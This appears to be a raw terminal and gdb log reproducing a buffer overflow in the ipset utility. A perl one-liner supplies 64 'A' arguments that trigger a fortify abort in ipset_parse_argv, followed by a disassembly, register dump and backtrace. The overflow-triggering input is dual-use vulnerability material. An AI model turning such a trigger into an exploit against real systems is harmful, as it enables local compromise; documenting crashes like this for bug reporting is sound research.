[marshall@oxagast.org]{05:12 PM}: [~] $ ipset add a $(perl -e 'print "A "x64;') *** buffer overflow detected ***: terminated Aborted (core dumped) [marshall@oxagast.org]{05:12 PM}: [~] $ gdb ipset GNU gdb (Ubuntu 9.2-0ubuntu1~20.04) 9.2 Copyright (C) 2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ipset... (No debugging symbols found in ipset) (gdb) r add a $(perl -e 'print "A "x64;') Starting program: /usr/sbin/ipset add a $(perl -e 'print "A "x64;') *** buffer overflow detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. 
(gdb) disas raise Dump of assembler code for function __GI_raise: 0x00007ffff7de50c0 <+0>: endbr64 0x00007ffff7de50c4 <+4>: sub $0x118,%rsp 0x00007ffff7de50cb <+11>: mov %edi,%r8d 0x00007ffff7de50ce <+14>: xor %edi,%edi 0x00007ffff7de50d0 <+16>: movdqa 0x179708(%rip),%xmm0 # 0x7ffff7f5e7e0 0x00007ffff7de50d8 <+24>: mov %fs:0x28,%rax 0x00007ffff7de50e1 <+33>: mov %rax,0x108(%rsp) 0x00007ffff7de50e9 <+41>: xor %eax,%eax 0x00007ffff7de50eb <+43>: mov %rsp,%r9 0x00007ffff7de50ee <+46>: mov $0xe,%eax 0x00007ffff7de50f3 <+51>: lea 0x80(%rsp),%rsi 0x00007ffff7de50fb <+59>: movaps %xmm0,0x80(%rsp) 0x00007ffff7de5103 <+67>: pcmpeqd %xmm0,%xmm0 0x00007ffff7de5107 <+71>: mov $0x8,%r10d 0x00007ffff7de510d <+77>: mov %r9,%rdx 0x00007ffff7de5110 <+80>: movaps %xmm0,0x90(%rsp) 0x00007ffff7de5118 <+88>: movaps %xmm0,0xa0(%rsp) 0x00007ffff7de5120 <+96>: movaps %xmm0,0xb0(%rsp) 0x00007ffff7de5128 <+104>: movaps %xmm0,0xc0(%rsp) 0x00007ffff7de5130 <+112>: movaps %xmm0,0xd0(%rsp) 0x00007ffff7de5138 <+120>: movaps %xmm0,0xe0(%rsp) 0x00007ffff7de5140 <+128>: movaps %xmm0,0xf0(%rsp) 0x00007ffff7de5148 <+136>: syscall 0x00007ffff7de514a <+138>: mov $0x27,%ecx 0x00007ffff7de514f <+143>: mov %ecx,%eax 0x00007ffff7de5151 <+145>: syscall 0x00007ffff7de5153 <+147>: mov %rax,%rdi 0x00007ffff7de5156 <+150>: mov $0xba,%eax 0x00007ffff7de515b <+155>: syscall 0x00007ffff7de515d <+157>: mov %eax,%esi 0x00007ffff7de515f <+159>: mov %r8d,%edx 0x00007ffff7de5162 <+162>: mov $0xea,%eax 0x00007ffff7de5167 <+167>: syscall 0x00007ffff7de5169 <+169>: cmp $0xfffffffffffff000,%rax 0x00007ffff7de516f <+175>: ja 0x7ffff7de51b0 <__GI_raise+240> 0x00007ffff7de5171 <+177>: mov %eax,%r8d 0x00007ffff7de5174 <+180>: mov $0x8,%r10d 0x00007ffff7de517a <+186>: xor %edx,%edx 0x00007ffff7de517c <+188>: mov %r9,%rsi 0x00007ffff7de517f <+191>: mov $0x2,%edi 0x00007ffff7de5184 <+196>: mov $0xe,%eax 0x00007ffff7de5189 <+201>: syscall => 0x00007ffff7de518b <+203>: mov 0x108(%rsp),%rax 0x00007ffff7de5193 <+211>: xor 
%fs:0x28,%rax 0x00007ffff7de519c <+220>: jne 0x7ffff7de51c4 <__GI_raise+260> 0x00007ffff7de519e <+222>: mov %r8d,%eax 0x00007ffff7de51a1 <+225>: add $0x118,%rsp 0x00007ffff7de51a8 <+232>: retq 0x00007ffff7de51a9 <+233>: nopl 0x0(%rax) 0x00007ffff7de51b0 <+240>: mov 0x1a4cb9(%rip),%rdx # 0x7ffff7f89e70 0x00007ffff7de51b7 <+247>: neg %eax 0x00007ffff7de51b9 <+249>: mov $0xffffffff,%r8d 0x00007ffff7de51bf <+255>: mov %eax,%fs:(%rdx) 0x00007ffff7de51c2 <+258>: jmp 0x7ffff7de5174 <__GI_raise+180> 0x00007ffff7de51c4 <+260>: callq 0x7ffff7ed1b00 <__stack_chk_fail> --Type <RET> for more, q to quit, c to continue without paging-- End of assembler dump. (gdb) info reg rax 0x0 0 rbx 0x7ffff7b91b80 140737349491584 rcx 0x7ffff7de518b 140737351930251 rdx 0x0 0 rsi 0x7fffffffd860 140737488345184 rdi 0x2 2 rbp 0x7fffffffdbe0 0x7fffffffdbe0 rsp 0x7fffffffd860 0x7fffffffd860 r8 0x0 0 r9 0x7fffffffd860 140737488345184 r10 0x8 8 r11 0x246 582 r12 0x7fffffffdae0 140737488345824 r13 0x20 32 r14 0x7ffff7ffb000 140737354117120 r15 0x1 1 rip 0x7ffff7de518b 0x7ffff7de518b <__GI_raise+203> eflags 0x246 [ PF ZF IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 k0 0x0 0 k1 0x0 0 k2 0x0 0 k3 0x0 0 k4 0x0 0 k5 0x0 0 k6 0x0 0 k7 0x0 0 (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7dc4859 in __GI_abort () at abort.c:79 #2 0x00007ffff7e2f3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f5907c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff7ed1b4a in __GI___fortify_fail ( msg=msg@entry=0x7ffff7f59012 "buffer overflow detected") at fortify_fail.c:26 #4 0x00007ffff7ed03e6 in __GI___chk_fail () at chk_fail.c:28 #5 0x00007ffff7fa90e5 in ipset_parse_argv () from /lib/x86_64-linux-gnu/libipset.so.13 #6 0x0000555555555163 in ?? 
() #7 0x00007ffff7dc60b3 in __libc_start_main (main=0x555555555120, argc=67, argv=0x7fffffffdeb8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdea8) at ../csu/libc-start.c:308 #8 0x00005555555551ee in ?? () (gdb) q A debugging session is active. Inferior 1 [process 3376917] will be killed. Quit anyway? (y or n) y